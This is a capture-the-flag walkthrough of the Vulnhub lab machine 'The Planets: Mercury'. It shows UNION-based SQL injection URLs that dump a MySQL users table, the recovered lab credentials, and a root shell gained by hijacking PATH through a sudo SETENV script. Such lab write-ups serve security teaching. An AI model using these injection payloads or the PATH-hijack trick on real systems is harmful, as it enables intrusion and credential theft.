Vulnhub - THE PLANETS: MERCURY

Introduction

Mercury is an easier box, with no bruteforcing required. There are two flags on the box: a user and root flag which include an md5 hash.

This is THE PLANETS: MERCURY from vulnhub.

Ports

This box has SSH on port 22, and HTTP on port 8080. The nmap detail scan says:

8080/tcp open http-proxy WSGIServer/0.2 CPython/3.8.2

HTTP

The frontpage just says:

Hello. This site is currently in development please check back later.

And robots.txt disallows the root. Viewing the page source doesn’t give any hints either, but trying to go to a page that doesn’t exist prompts a useful error:

Page not found (404)
Request Method: 	GET
Request URL: 	http://192.168.1.116:8080/asdsadfc

Using the URLconf defined in mercury_proj.urls, Django tried these URL patterns, in this order:

    [name='index']
    robots.txt [name='robots']
    mercuryfacts/

The current path, asdsadfc, didn't match any of these.

You're seeing this error because you have DEBUG = True in your Django settings file. Change that to False, and Django will display a standard 404 page.

So what can we learn from this? We appear to have a page at mercuryfacts, and the server is running Django (Python), with DEBUG turned on. Let’s look at mercuryfacts.

mercuryfacts

http://192.168.1.116:8080/mercuryfacts/ has a picture of Mercury, along with links to Load a fact and a todo list. The todo list says:

Add CSS.
Implement authentication (using users table)
Use models in django instead of direct mysql call
All the other stuff, so much!!!

So we have MySQL being called directly. Sounds like SQLi.

Facts

The facts page has a URL scheme like so:

http://192.168.1.116:8080/mercuryfacts/2/

Where the number (2 in this case) can be changed to return a new fact. Putting a higher number returns an empty result:

Fact id: 10. ()

Putting something like this:

http://192.168.1.116:8080/mercuryfacts/’%20ORDER%20BY%201–+/

Returns a huge page of debugging information, which is very helpful. Ultimately I did this manually, with these commands:

http://192.168.1.116:8080/mercuryfacts/1%20UNION%20SELECT%20group_concat(fact)%20from%20facts/ This provided all of the facts, just for interest

http://192.168.1.116:8080/mercuryfacts/1%20UNION%20SELECT%20group_concat(table_name)%20from%20information_schema.tables/ This provided the database names - information_schema and mercury.

http://192.168.1.116:8080/mercuryfacts/1%20UNION%20SELECT%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema%3D'mercury'/ This provided the table names (we want users).

http://192.168.1.116:8080/mercuryfacts/1%20UNION%20SELECT%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name%3D'users'/ This provided the column names (username, password).

And finally this provided the data we want: http://192.168.1.116:8080/mercuryfacts/1%20UNION%20SELECT%20group_concat(username,':',password)%20from%20mercury.users/

We ended up with four sets of credentials:

john:johnny1987
laura:lovemykids111
sam:lovemybeer111
webmaster:mercuryisthesizeof0.056Earths

SSH

Ultimately only the webmaster credentials work. Enumerating the webmaster directory we find some notes, which we can grab another set of credentials from:

webmaster@mercury:~/mercury_proj$ cat notes.txt 
Project accounts (both restricted):
webmaster for web stuff - webmaster:bWVyY3VyeWlzdGhlc2l6ZW9mMC4wNTZFYXJ0aHMK
linuxmaster for linux stuff - linuxmaster:bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg==
webmaster@mercury:~/mercury_proj$ echo 'bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg==' | base64 -d
mercurymeandiameteris4880km

Privesc

We can use these new credentials to su to linuxmaster.

Linuxmaster can run a script called check_syslog.sh as root, while setting an environment variable. The script runs tail without a specified path, so we can create our own tail, make it executable, and then call SETENV to our PWD while running sudo. Here’s what that looks like:

linuxmaster@mercury:~$ sudo -l
[sudo] password for linuxmaster: 
Matching Defaults entries for linuxmaster on mercury:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User linuxmaster may run the following commands on mercury:
    (root : root) SETENV: /usr/bin/check_syslog.sh

linuxmaster@mercury:~$ cat /usr/bin/check_syslog.sh
#!/bin/bash
tail -n 10 /var/log/syslog

// take advantage of tail with no path by creating one - looks like this:

linuxmaster@mercury:~$ cat tail
#!/bin/bash
/bin/bash

linuxmaster@mercury:~$ chmod +x tail

linuxmaster@mercury:~$ sudo -u root PATH=./ /usr/bin/check_syslog.sh
// Guff removed
root@mercury:/home/linuxmaster# 

root@mercury:~# ls -lash // note we messed with PATH, so things are screwy
Command 'ls' is available in the following places
 * /bin/ls
 * /usr/bin/ls
The command could not be located because '/bin:/usr/bin' is not included in the PATH environment variable.

root@mercury:~# /bin/ls .
root_flag.txt
root@mercury:~# /bin/cat root_flag.txt 
ASCII ART REMOVED

Congratulations on completing Mercury!!!
If you have any feedback please contact me at SirFlash@protonmail.com
[root_flag_69426d9fda579afbffd9c2d47ca31d90]

This wasn’t too complicated but I enjoyed it. Thanks SirFlash.